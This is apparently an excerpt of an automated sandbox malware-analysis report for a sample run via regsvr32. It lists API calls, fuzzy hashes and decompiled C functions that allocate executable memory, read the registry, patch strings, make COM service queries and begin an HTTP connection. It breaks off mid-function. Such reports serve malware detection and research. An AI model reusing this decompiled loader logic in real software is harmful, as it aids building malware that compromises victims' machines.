                • Instruction ID: 269a648a8a962f97ebef2def00e52193263dcd7ebc3e047b3d6302e6b5be0576
                • Opcode Fuzzy Hash: 2be944133dcec72a93e528b9ec7221ebb38e96dcd150b0ff15b071b3e50e1918
                • Instruction Fuzzy Hash: 56018F36200209BFDB11AF55DC45E9A7BBDFB88744F000424FB049A150DB71D864CB60
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • memset.NTDLL ref: 04BC3B3F
                • memcpy.NTDLL ref: 04BC3B67
                  • Part of subcall function 04BE3E7D: NtAllocateVirtualMemory.NTDLL(04BD6359,00000000,00000000,04BD6359,00003000,00000040), ref: 04BE3EAE
                  • Part of subcall function 04BE3E7D: RtlNtStatusToDosError.NTDLL(00000000), ref: 04BE3EB5
                  • Part of subcall function 04BE3E7D: SetLastError.KERNEL32(00000000), ref: 04BE3EBC
                • GetLastError.KERNEL32(00000010,00000218,04BE6D9D,00000100,?,00000318,00000008), ref: 04BC3B7E
                • GetLastError.KERNEL32(00000010,?,00000000,00000318,?,?,?,?,?,?,?,?,00000010,00000218,04BE6D9D,00000100), ref: 04BC3C61
                Memory Dump Source
                • Source File: 00000003.00000002.518664353.0000000004BC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4bc0000_regsvr32.jbxd
                Similarity
                • API ID: Error$Last$AllocateMemoryStatusVirtualmemcpymemset
                • String ID:
                • API String ID: 685050087-0
                • Opcode ID: be643f7ae70f09263fec6fcd694988343df923f94c646afbfd3e4eb0f44af196
                • Instruction ID: d1cf42cfa5d943c4b726fe7d1bf9c9d0a27c90df6371af777a4a9c3c4e48f28c
                • Opcode Fuzzy Hash: be643f7ae70f09263fec6fcd694988343df923f94c646afbfd3e4eb0f44af196
                • Instruction Fuzzy Hash: 214185B1544705AFD760DF25CC81FABBBE8EB88314F40896DF999C6250E730E5148B62
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                  • Part of subcall function 04BE41CF: lstrlen.KERNEL32(?,00000000,04BE249E,00000027,04BEE268,?,00000000,?,?,04BE249E,?,00000001,?,04BDA7DD,00000000,?), ref: 04BE4205
                  • Part of subcall function 04BE41CF: lstrcpy.KERNEL32(00000000,00000000), ref: 04BE4229
                  • Part of subcall function 04BE41CF: lstrcat.KERNEL32(00000000,00000000), ref: 04BE4231
                • RegOpenKeyExA.KERNELBASE(04BCF629,00000000,00000000,00020119,80000001,00000000,?,00000000,?,00000000,?,04BCF629,80000001,?,04BDE99E), ref: 04BDA324
                • RegOpenKeyExA.ADVAPI32(04BCF629,04BCF629,00000000,00020019,80000001,?,04BCF629,80000001,?,04BDE99E), ref: 04BDA33A
                • RegCloseKey.ADVAPI32(80000001,80000001,?,04BDE99E,04BDE9AE,?,04BCF629,80000001,?,04BDE99E), ref: 04BDA383
                Memory Dump Source
                • Source File: 00000003.00000002.518664353.0000000004BC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4bc0000_regsvr32.jbxd
                Similarity
                • API ID: Open$Closelstrcatlstrcpylstrlen
                • String ID:
                • API String ID: 4131162436-0
                • Opcode ID: 7c444e7c41fa2bbe91b6ffaab39981543a77b7c65a9c531eafd7b0b4629cfc6f
                • Instruction ID: 3a1aa4dca48a1392e5f5254f4abb4c81b94f9150142081a4c499fff2b93b1826
                • Opcode Fuzzy Hash: 7c444e7c41fa2bbe91b6ffaab39981543a77b7c65a9c531eafd7b0b4629cfc6f
                • Instruction Fuzzy Hash: E8215B71900209BFDF00DFA6DDC1CAEBBBDEF48314B0040EAE504A7150E771AE549B60
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 79%
                			E031F2638(void* __eax, char* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16, void** _a20, intOrPtr* _a24) {
                				char _v5;
                				signed int _v12;
                				intOrPtr _v16;
                				char _t28;
                				void* _t33;
                				void* _t38;
                				void* _t45;
                				char* _t46;
                				void* _t48;
                				char* _t56;
                				char* _t57;
                				intOrPtr _t59;
                				void* _t60;
                
                				_t56 = _a4;
                				_t60 = __eax;
                				_v12 = 0xb;
                				if(_t56 != 0 && __eax != 0) {
                					_t5 = _t60 - 1; // -1
                					_t46 =  &(_t56[_t5]);
                					_t28 =  *_t46;
                					_v5 = _t28;
                					 *_t46 = 0;
                					__imp__(_a8, _t45);
                					_v16 = _t28;
                					_t57 = StrStrA(_t56, _a8);
                					if(_t57 != 0) {
                						 *_t46 = _v5;
                						_t33 = RtlAllocateHeap( *0x31fa290, 0, _a16 + _t60); // executed
                						_t48 = _t33;
                						if(_t48 == 0) {
                							_v12 = 8;
                						} else {
                							_t58 = _t57 - _a4;
                							E031F7A9C(_t57 - _a4, _a4, _t48);
                							_t38 = E031F7A9C(_a16, _a12, _t58 + _t48);
                							_t53 = _v16;
                							_t59 = _a16;
                							E031F7A9C(_t60 - _t58 - _v16, _t53 + _t58 + _a4, _t38 + _t59);
                							 *_a20 = _t48;
                							_v12 = _v12 & 0x00000000;
                							 *_a24 = _t60 - _v16 + _t59;
                						}
                					}
                				}
                				return _v12;
                			}

                APIs
                • lstrlen.KERNEL32(74E5F710,?,00000000,?,74E5F710), ref: 031F266C
                • StrStrA.SHLWAPI(00000000,?), ref: 031F2679
                • RtlAllocateHeap.NTDLL(00000000,?), ref: 031F2698
                Memory Dump Source
                • Source File: 00000003.00000002.516097770.00000000031F1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031F0000, based on PE: true
                • Associated: 00000003.00000002.516050740.00000000031F0000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.516231740.00000000031F9000.00000002.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.516301623.00000000031FA000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.516392711.00000000031FC000.00000002.10000000.00040000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_31f0000_regsvr32.jbxd
                Similarity
                • API ID: AllocateHeaplstrlen
                • String ID:
                • API String ID: 556738718-0
                • Opcode ID: 550982521b3bbe79b1f544ac0d555b5d4bf48c9f61846edeb42ab90499347e1a
                • Instruction ID: 9a69ea0f902204a2027ee6d737ae02acf9b864bcc533320325fcc185d32d5277
                • Opcode Fuzzy Hash: 550982521b3bbe79b1f544ac0d555b5d4bf48c9f61846edeb42ab90499347e1a
                • Instruction Fuzzy Hash: 31218339600249AFCF01DF6CC884B9EBFB9EF89250F098155ED04AB305D735E956DBA0
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 47%
                			E031F1590(char* _a4, char** _a8) {
                				char* _t7;
                				char* _t11;
                				char* _t14;
                				char* _t16;
                				char* _t17;
                				char _t18;
                				signed int _t20;
                				signed int _t22;
                
                				_t16 = _a4;
                				_push(0x20);
                				_t20 = 1;
                				_push(_t16);
                				while(1) {
                					_t7 = StrChrA();
                					if(_t7 == 0) {
                						break;
                					}
                					_t20 = _t20 + 1;
                					_push(0x20);
                					_push( &(_t7[1]));
                				}
                				_t11 = E031F2114(_t20 << 2);
                				_a4 = _t11;
                				if(_t11 != 0) {
                					StrTrimA(_t16, 0x31f92a4); // executed
                					_t22 = 0;
                					do {
                						_t14 = StrChrA(_t16, 0x20);
                						if(_t14 != 0) {
                							 *_t14 = 0;
                							do {
                								_t14 =  &(_t14[1]);
                								_t18 =  *_t14;
                							} while (_t18 == 0x20 || _t18 == 9);
                						}
                						_t17 = _a4;
                						 *(_t17 + _t22 * 4) = _t16;
                						_t22 = _t22 + 1;
                						_t16 = _t14;
                					} while (_t14 != 0);
                					 *_a8 = _t17;
                				}
                				return 0;
                			}

                APIs
                • StrChrA.SHLWAPI(?,00000020,00000000,056095AC,?,?,031F21E5,?,056095AC), ref: 031F15AC
                • StrTrimA.KERNELBASE(?,031F92A4,00000002,?,031F21E5,?,056095AC), ref: 031F15CA
                • StrChrA.SHLWAPI(?,00000020,?,031F21E5,?,056095AC), ref: 031F15D5
                Memory Dump Source
                • Source File: 00000003.00000002.516097770.00000000031F1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031F0000, based on PE: true
                • Associated: 00000003.00000002.516050740.00000000031F0000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.516231740.00000000031F9000.00000002.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.516301623.00000000031FA000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.516392711.00000000031FC000.00000002.10000000.00040000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_31f0000_regsvr32.jbxd
                Similarity
                • API ID: Trim
                • String ID:
                • API String ID: 3043112668-0
                • Opcode ID: 614403ed7bd8cffbcc513ac6cee551227bbe8bfcc3348fdcf8646de022681ada
                • Instruction ID: 01a453c6c78e5e3bd2d4b75c39b1306ddc4f858ae63d38979186bd157ac4844b
                • Opcode Fuzzy Hash: 614403ed7bd8cffbcc513ac6cee551227bbe8bfcc3348fdcf8646de022681ada
                • Instruction Fuzzy Hash: E9019E72304305BFE710DA2A8C45F677A9DEB8E641F094021AB5ACB252DB70D842C770
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 64%
                			E031F6096(intOrPtr __edi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                				intOrPtr _v36;
                				intOrPtr _v44;
                				intOrPtr _v48;
                				intOrPtr _v52;
                				void _v60;
                				char _v64;
                				long _t14;
                				intOrPtr _t18;
                				intOrPtr _t19;
                				intOrPtr _t26;
                				intOrPtr _t27;
                				long _t28;
                
                				_t27 = __edi;
                				_t26 = _a8;
                				_t14 = E031F2D2F(_a4, _t26, __edi); // executed
                				_t28 = _t14;
                				if(_t28 != 0) {
                					memset( &_v60, 0, 0x38);
                					_t18 =  *0x31fa2d8; // 0x240d5a8
                					_t28 = 0;
                					_v64 = 0x3c;
                					if(_a12 == 0) {
                						_t7 = _t18 + 0x31fb4e8; // 0x70006f
                						_t19 = _t7;
                					} else {
                						_t6 = _t18 + 0x31fb8f0; // 0x750072
                						_t19 = _t6;
                					}
                					_v52 = _t19;
                					_push(_t28);
                					_v48 = _a4;
                					_v44 = _t26;
                					_v36 = _t27;
                					E031F6CFD();
                					_push( &_v64);
                					if( *0x31fa100() == 0) {
                						_t28 = GetLastError();
                					}
                					_push(1);
                					E031F6CFD();
                				}
                				return _t28;
                			}

                APIs
                  • Part of subcall function 031F2D2F: SysAllocString.OLEAUT32(00000000), ref: 031F2D8B
                  • Part of subcall function 031F2D2F: SysAllocString.OLEAUT32(0070006F), ref: 031F2D9F
                  • Part of subcall function 031F2D2F: SysAllocString.OLEAUT32(00000000), ref: 031F2DB1
                  • Part of subcall function 031F2D2F: SysFreeString.OLEAUT32(00000000), ref: 031F2E15
                • memset.NTDLL ref: 031F60B9
                • GetLastError.KERNEL32 ref: 031F6105
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.516097770.00000000031F1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031F0000, based on PE: true
                • Associated: 00000003.00000002.516050740.00000000031F0000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.516231740.00000000031F9000.00000002.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.516301623.00000000031FA000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.516392711.00000000031FC000.00000002.10000000.00040000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_31f0000_regsvr32.jbxd
                Similarity
                • API ID: String$Alloc$ErrorFreeLastmemset
                • String ID: <
                • API String ID: 1330562889-4251816714
                • Opcode ID: ae31a181c6a595d329206c22546a342df246f7372b6d3f6154f762b51220fd91
                • Instruction ID: 8f7fa3c36d66172352888309ddaa2db33a17c22ba911a4e7ce5733d4e25daa93
                • Opcode Fuzzy Hash: ae31a181c6a595d329206c22546a342df246f7372b6d3f6154f762b51220fd91
                • Instruction Fuzzy Hash: 77012D75D00218AFCB10FFA9D884ECEBBBCEF0C650F048126FA08EB241D77095418BA1
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • RegCreateKeyA.ADVAPI32(80000001,0624B7F0,?), ref: 04BCD0FB
                • RegOpenKeyA.ADVAPI32(80000001,0624B7F0,?), ref: 04BCD105
                • lstrlen.KERNEL32(0624B7F0,00000000,00000000,04BED06E,?,?,?,04BC902F,00000001,?), ref: 04BCD124
                Memory Dump Source
                • Source File: 00000003.00000002.518664353.0000000004BC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4bc0000_regsvr32.jbxd
                Similarity
                • API ID: CreateOpenlstrlen
                • String ID:
                • API String ID: 2865187142-0
                • Opcode ID: f461dfbc9e539ab7d5b143cbf44890e35489362a9f7b08962c9b8be665492fb6
                • Instruction ID: 58713fed7e0c87ace080b8f5daecf55e278875f6033027fbb02aab87fce93366
                • Opcode Fuzzy Hash: f461dfbc9e539ab7d5b143cbf44890e35489362a9f7b08962c9b8be665492fb6
                • Instruction Fuzzy Hash: 24F03676100208BFEB11AF91DCC5F9B7B7CEB85764F10805AFD459A140E6B4BA90C771
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • SetEvent.KERNEL32(0000053C,04BE3A8C), ref: 04BCE02E
                  • Part of subcall function 04BC609C: SleepEx.KERNEL32(00000064,00000001,00000000,?,?,?,04BCE039), ref: 04BC60C5
                  • Part of subcall function 04BC609C: RtlDeleteCriticalSection.NTDLL(04BEE460), ref: 04BC60F8
                  • Part of subcall function 04BC609C: RtlDeleteCriticalSection.NTDLL(04BEE480), ref: 04BC60FF
                  • Part of subcall function 04BC609C: ReleaseMutex.KERNEL32(000002B4,00000000,?,?,?,04BCE039), ref: 04BC6128
                  • Part of subcall function 04BC609C: CloseHandle.KERNEL32(?,?,04BCE039), ref: 04BC6134
                  • Part of subcall function 04BC609C: ResetEvent.KERNEL32(00000000,00000000,?,?,?,04BCE039), ref: 04BC6140
                  • Part of subcall function 04BC609C: CloseHandle.KERNEL32(?,?,04BCE039), ref: 04BC614C
                  • Part of subcall function 04BC609C: SleepEx.KERNEL32(00000064,00000001,00000000,?,?,?,04BCE039), ref: 04BC6152
                  • Part of subcall function 04BC609C: SleepEx.KERNEL32(00000064,00000001,?,?,04BCE039), ref: 04BC6166
                  • Part of subcall function 04BC609C: HeapFree.KERNEL32(00000000,00000000,?,?,04BCE039), ref: 04BC618A
                  • Part of subcall function 04BC609C: RtlRemoveVectoredExceptionHandler.NTDLL(04C005B8), ref: 04BC61C0
                  • Part of subcall function 04BC609C: SleepEx.KERNEL32(00000064,00000001,?,?,04BCE039), ref: 04BC61DC
                • CloseHandle.KERNEL32(0000053C), ref: 04BCE043
                • HeapDestroy.KERNELBASE(05E50000), ref: 04BCE053
                Memory Dump Source
                • Source File: 00000003.00000002.518664353.0000000004BC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4bc0000_regsvr32.jbxd
                Similarity
                • API ID: Sleep$CloseHandle$CriticalDeleteEventHeapSection$DestroyExceptionFreeHandlerMutexReleaseRemoveResetVectored
                • String ID:
                • API String ID: 2773679374-0
                • Opcode ID: 9b372ee26e4f71d73d639a624dfcd6f5d4915735aa81c858f8f71c36da089139
                • Instruction ID: 869fe3a44686bd5a7d596a1ed784f0c559df1b7fbf1fafb137204bb9a0ecb4aa
                • Opcode Fuzzy Hash: 9b372ee26e4f71d73d639a624dfcd6f5d4915735aa81c858f8f71c36da089139
                • Instruction Fuzzy Hash: 2CE01774700A01CBEB20AF32E8CDF0633A8EBC0201748086AB611DB482DB2CFC009AB4
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E031F1A55(void* _a4, intOrPtr _a8, intOrPtr _a12) {
                				int _v12;
                				signed int _v16;
                				void* _v20;
                				signed char _v36;
                				void* _t24;
                				intOrPtr _t27;
                				void* _t35;
                				signed int _t38;
                				signed char* _t46;
                				int _t53;
                				void* _t55;
                				void* _t56;
                				void* _t57;
                
                				_v16 = _v16 & 0x00000000;
                				_t46 = _a4;
                				_t53 = ( *_t46 & 0x000000ff) + 0x110;
                				_v12 = 0x110;
                				_t24 = E031F2114(_t53);
                				_a4 = _t24;
                				if(_t24 != 0) {
                					memcpy(_t24,  *0x31fa330, 0x110);
                					_t27 =  *0x31fa334; // 0x0
                					_t57 = _t56 + 0xc;
                					if(_t27 != 0) {
                						_t51 = _a4;
                						E031F4B70(0x110, _a4, _t27, 0);
                					}
                					if(E031F6D8B( &_v36) != 0) {
                						_t35 = E031F78F2(0x110, 0,  &_v36, _a4,  &_v20,  &_v12); // executed
                						if(_t35 == 0) {
                							_t55 = _v20;
                							_v36 =  *_t46;
                							_t38 = E031F24F7(_t55, _a8, _t51, _t46, _a12); // executed
                							_v16 = _t38;
                							 *(_t55 + 4) = _v36;
                							_t20 =  &(_t46[4]); // 0xbf0845c7
                							memset(_t55, 0, _v12 - ( *_t20 & 0xf));
                							_t57 = _t57 + 0xc;
                							E031F2C11(_t55);
                						}
                					}
                					memset(_a4, 0, _t53);
                					E031F2C11(_a4);
                				}
                				return _v16;
                			}

                APIs
                  • Part of subcall function 031F2114: RtlAllocateHeap.NTDLL(00000000,00000000,031F6F72), ref: 031F2120
                • memcpy.NTDLL(00000000,00000110,?,?,?,?,031F4F92,?,031F7307,031F7307,?), ref: 031F1A8B
                • memset.NTDLL ref: 031F1B00
                • memset.NTDLL ref: 031F1B14
                Memory Dump Source
                • Source File: 00000003.00000002.516097770.00000000031F1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031F0000, based on PE: true
                • Associated: 00000003.00000002.516050740.00000000031F0000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.516231740.00000000031F9000.00000002.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.516301623.00000000031FA000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.516392711.00000000031FC000.00000002.10000000.00040000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_31f0000_regsvr32.jbxd
                Similarity
                • API ID: memset$AllocateHeapmemcpy
                • String ID:
                • API String ID: 1529149438-0
                • Opcode ID: 26a6a9044868d8bc47b33cdd67d37da5cadacdf75f12f7b793385fadab28694a
                • Instruction ID: a618b25e185469cd2d62776cdaca7b55c41326e404959bff3343246e831830d8
                • Opcode Fuzzy Hash: 26a6a9044868d8bc47b33cdd67d37da5cadacdf75f12f7b793385fadab28694a
                • Instruction Fuzzy Hash: 98210A79A00218BFDB11EBA5CC41FEEBBB8AF4C640F044065FA08EA241E734D645CBA5
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 89%
                			E031F3035(void* __eax, void* __ecx, intOrPtr* __esi, void* _a4) {
                				char _v8;
                				void* _t14;
                				intOrPtr _t17;
                				void* _t20;
                				void* _t26;
                
                				_push(__ecx);
                				if(_a4 == 0 || __eax == 0) {
                					_t26 = 0x57;
                				} else {
                					_t14 = E031F134A(__eax,  &_a4, _a4,  &_a4,  &_v8); // executed
                					_t26 = _t14;
                					if(_t26 == 0) {
                						_t17 =  *0x31fa2d8; // 0x240d5a8
                						_t9 = _t17 + 0x31fba3c; // 0x444f4340
                						_t20 = E031F2638( *((intOrPtr*)(__esi + 4)),  *__esi, _t9, _a4, _v8, __esi + 8, __esi + 0xc); // executed
                						_t26 = _t20;
                						RtlFreeHeap( *0x31fa290, 0, _a4); // executed
                					}
                				}
                				return _t26;
                			}

                APIs
                  • Part of subcall function 031F134A: RtlAllocateHeap.NTDLL(00000000,00000000,?), ref: 031F1362
                  • Part of subcall function 031F2638: lstrlen.KERNEL32(74E5F710,?,00000000,?,74E5F710), ref: 031F266C
                  • Part of subcall function 031F2638: StrStrA.SHLWAPI(00000000,?), ref: 031F2679
                  • Part of subcall function 031F2638: RtlAllocateHeap.NTDLL(00000000,?), ref: 031F2698
                • RtlFreeHeap.NTDLL(00000000,00000000,?,444F4340,00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,031F20B3), ref: 031F308B
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.516097770.00000000031F1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031F0000, based on PE: true
                • Associated: 00000003.00000002.516050740.00000000031F0000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.516231740.00000000031F9000.00000002.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.516301623.00000000031FA000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.516392711.00000000031FC000.00000002.10000000.00040000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_31f0000_regsvr32.jbxd
                Similarity
                • API ID: Heap$Allocate$Freelstrlen
                • String ID: Ut
                • API String ID: 2220322926-8415677
                • Opcode ID: c5fcef357b040dc78361277312b8ca784f3b2c7ad96aff160db37a8c5a2cc7da
                • Instruction ID: c761c2ea6d7b077e6a38dbff9cae8fbca58b898c9a8bfbfa3946ace5ae251c26
                • Opcode Fuzzy Hash: c5fcef357b040dc78361277312b8ca784f3b2c7ad96aff160db37a8c5a2cc7da
                • Instruction Fuzzy Hash: 4C01813A100608FFDB15DF54CC04E9A7BA9EF4C350F148525FA5A86660E732EA95DF60
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E031F2C11(void* _a4) {
                				char _t2;
                
                				_t2 = RtlFreeHeap( *0x31fa290, 0, _a4); // executed
                				return _t2;
                			}

                APIs
                • RtlFreeHeap.NTDLL(00000000,00000000,031F7013,00000000,?,?,00000000), ref: 031F2C1D
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.516097770.00000000031F1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031F0000, based on PE: true
                • Associated: 00000003.00000002.516050740.00000000031F0000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.516231740.00000000031F9000.00000002.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.516301623.00000000031FA000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.516392711.00000000031FC000.00000002.10000000.00040000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_31f0000_regsvr32.jbxd
                Similarity
                • API ID: FreeHeap
                • String ID: Ut
                • API String ID: 3298025750-8415677
                • Opcode ID: fd699bdc60b095284c569a5ecda977582e4688aded8d8505f1225598d0677055
                • Instruction ID: d383bb6974a02bdcd94ba0b4b054b036d13b5f4c5e948f26c581a4ad12549709
                • Opcode Fuzzy Hash: fd699bdc60b095284c569a5ecda977582e4688aded8d8505f1225598d0677055
                • Instruction Fuzzy Hash: D2B01231104100AFCB0A7B00DD08F057B22FB5CB00F004010B20D80078C33384B0FF24
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 38%
                			E031F63FF(intOrPtr _a4) {
                				void* _v12;
                				void* _v16;
                				void* _v20;
                				void* _v24;
                				void* _v28;
                				char _v32;
                				intOrPtr _v40;
                				void* _v46;
                				short _v48;
                				intOrPtr _t49;
                				void* _t51;
                				intOrPtr* _t53;
                				intOrPtr _t56;
                				void* _t58;
                				intOrPtr* _t59;
                				intOrPtr* _t61;
                				intOrPtr* _t63;
                				intOrPtr* _t65;
                				intOrPtr* _t67;
                				intOrPtr* _t69;
                				intOrPtr* _t71;
                				intOrPtr* _t73;
                				intOrPtr _t76;
                				intOrPtr* _t79;
                				short _t81;
                				char* _t97;
                				intOrPtr _t99;
                				void* _t105;
                				void* _t107;
                				intOrPtr _t111;
                
                				_t81 = 0;
                				_v48 = 0;
                				asm("stosd");
                				asm("stosd");
                				asm("stosd");
                				asm("stosw");
                				_t49 =  *0x31fa2d8; // 0x240d5a8
                				_t4 = _t49 + 0x31fb44c; // 0x56089f4
                				_t5 = _t49 + 0x31fb43c; // 0x9ba05972
                				_t51 =  *0x31fa140(_t5, 0, 4, _t4,  &_v20); // executed
                				_t105 = _t51;
                				if(_t105 >= 0) {
                					_t53 = _v20;
                					_push( &_v12);
                					_push(1);
                					_push( &_v32);
                					_push(8);
                					_t97 =  &_v48;
                					_push(_t97);
                					_push(_t97);
                					_push(_t53); // executed
                					if( *((intOrPtr*)( *_t53 + 0x3c))() == 0) {
                						_t56 =  *0x31fa2d8; // 0x240d5a8
                						_t30 = _t56 + 0x31fb42c; // 0x56089d4
                						_t31 = _t56 + 0x31fb45c; // 0x4c96be40
                						_t58 =  *0x31fa114(_v12, _t31, _t30,  &_v24); // executed
                						_t105 = _t58;
                						_t59 = _v12;
                						 *((intOrPtr*)( *_t59 + 8))(_t59);
                						goto L11;
                					} else {
                						_t71 = _v20;
                						_v16 = 0;
                						_t105 =  *((intOrPtr*)( *_t71 + 0x1c))(_t71,  &_v16);
                						if(_t105 >= 0) {
                							_t111 = _v16;
                							if(_t111 == 0) {
                								_t105 = 0x80004005;
                								goto L11;
                							} else {
                								if(_t111 <= 0) {
                									L11:
                									if(_t105 >= 0) {
                										goto L12;
                									}
                								} else {
                									do {
                										_t73 = _v20;
                										_v48 = 3;
                										_v40 = _t81;
                										_t107 = _t107 - 0x10;
                										asm("movsd");
                										asm("movsd");
                										asm("movsd");
                										asm("movsd");
                										_t105 =  *((intOrPtr*)( *_t73 + 0x20))(_t73,  &_v12);
                										if(_t105 < 0) {
                											goto L7;
                										} else {
                											_t76 =  *0x31fa2d8; // 0x240d5a8
                											_t23 = _t76 + 0x31fb42c; // 0x56089d4
                											_t24 = _t76 + 0x31fb45c; // 0x4c96be40
                											_t105 =  *0x31fa114(_v12, _t24, _t23,  &_v24);
                											_t79 = _v12;
                											 *((intOrPtr*)( *_t79 + 8))(_t79);
                											if(_t105 >= 0) {
                												L12:
                												_t63 = _v24;
                												_t105 =  *((intOrPtr*)( *_t63 + 0x3c))(_t63,  &_v28);
                												if(_t105 >= 0) {
                													_t99 =  *0x31fa2d8; // 0x240d5a8
                													_t67 = _v28;
                													_t40 = _t99 + 0x31fb41c; // 0x214e3
                													_t105 =  *((intOrPtr*)( *_t67))(_t67, _t40, _a4);
                													_t69 = _v28;
                													 *((intOrPtr*)( *_t69 + 8))(_t69);
                												}
                												_t65 = _v24;
                												 *((intOrPtr*)( *_t65 + 8))(_t65);
                											} else {
                												goto L7;
                											}
                										}
                										goto L15;
                										L7:
                										_t81 = _t81 + 1;
                									} while (_t81 < _v16);
                									goto L11;
                								}
                							}
                						}
                					}
                					L15:
                					_t61 = _v20;
                					 *((intOrPtr*)( *_t61 + 8))(_t61);
                				}
                				return _t105;
                			}

                APIs
                • IUnknown_QueryService.SHLWAPI(00000000,4C96BE40,056089D4,031F2D5F,?,?,?,?,?,?,?,?,?,?,?,031F2D5F), ref: 031F64CB
                • IUnknown_QueryService.SHLWAPI(00000000,4C96BE40,056089D4,031F2D5F,?,?,?,?,?,?,?,031F2D5F,00000000,00000000,00000000,006D0063), ref: 031F6509
                Memory Dump Source
                • Source File: 00000003.00000002.516097770.00000000031F1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031F0000, based on PE: true
                • Associated: 00000003.00000002.516050740.00000000031F0000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.516231740.00000000031F9000.00000002.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.516301623.00000000031FA000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.516392711.00000000031FC000.00000002.10000000.00040000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_31f0000_regsvr32.jbxd
                Similarity
                • API ID: QueryServiceUnknown_
                • String ID:
                • API String ID: 2042360610-0
                • Opcode ID: f80b06c47aa49f9d764c011c205554df3f4543c6f4354e0be0209256cf792a59
                • Instruction ID: ea86aa52867e3928e15d1133ffa7e58b22875102b8d17126d1dac3a328d6af02
                • Opcode Fuzzy Hash: f80b06c47aa49f9d764c011c205554df3f4543c6f4354e0be0209256cf792a59
                • Instruction Fuzzy Hash: 04514076900519AFCB00DFE8C888DAEB7B8FF8C714B158559EA05EB225D731AD45CFA0
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 21%
                			E031F3807(void* __ecx, intOrPtr* __esi, void* __eflags, signed int _a4, char _a8) {
                				void* _v8;
                				char _v12;
                				signed int _t37;
                				long _t39;
                				long _t40;
                				signed int _t41;
                				void* _t42;
                				signed int _t43;
                				intOrPtr _t44;
                				intOrPtr _t45;
                				intOrPtr _t46;
                				intOrPtr _t48;
                				void* _t65;
                				intOrPtr* _t67;
                				intOrPtr* _t68;
                				void* _t71;
                
                				_t68 = __esi;
                				_t65 = E031F23CC(_t37, _a4);
                				if(_t65 == 0) {
                					L18:
                					_t39 = GetLastError();
                				} else {
                					_t40 = GetVersion();
                					_t71 = _t40 - 6;
                					if(_t71 > 0 || _t71 == 0 && _t40 > 2) {
                						_a4 = 4;
                					} else {
                						_a4 = 0;
                					}
                					__imp__(_t65, _a4, 0, 0, 0); // executed
                					 *(_t68 + 0x10) = _t40;
                					_t41 = E031F2C11(_t65);
                					if( *(_t68 + 0x10) == 0) {
                						goto L18;
                					} else {
                						_t42 = E031F23CC(_t41,  *_t68);
                						_v8 = _t42;
                						if(_t42 == 0) {
                							goto L18;
                						} else {
                							_t67 = __imp__; // 0x6f99f5a0
                							if(_a8 == 0) {
                								L10:
                								__imp__( *(_t68 + 0x10), _v8, 0x50, 0);
